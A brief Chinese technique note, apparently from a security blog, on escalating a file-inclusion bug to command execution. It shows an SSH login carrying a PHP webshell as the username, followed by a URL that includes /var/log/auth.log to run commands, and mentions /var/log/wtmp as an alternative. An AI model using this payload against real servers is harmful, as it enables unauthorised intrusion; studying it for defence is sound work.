LFI_SSH日志

登陆SSH:

ssh '<?php system($_GET[‘c’]); ?>'@192.168.1.105

包含文件:

http://192.168.1.105/lfi/lfi.php?file=/var/log/auth.log&c=ls

/var/log/auth.log只有ubuntu系有。 其实对linux,可以包含/var/log/wtmp。一样的效果。有16字符可控,足够了。 只可以没有x权限,要不然ssrf fastcgi就有意思了。

-------------本文结束❤感谢阅读-------------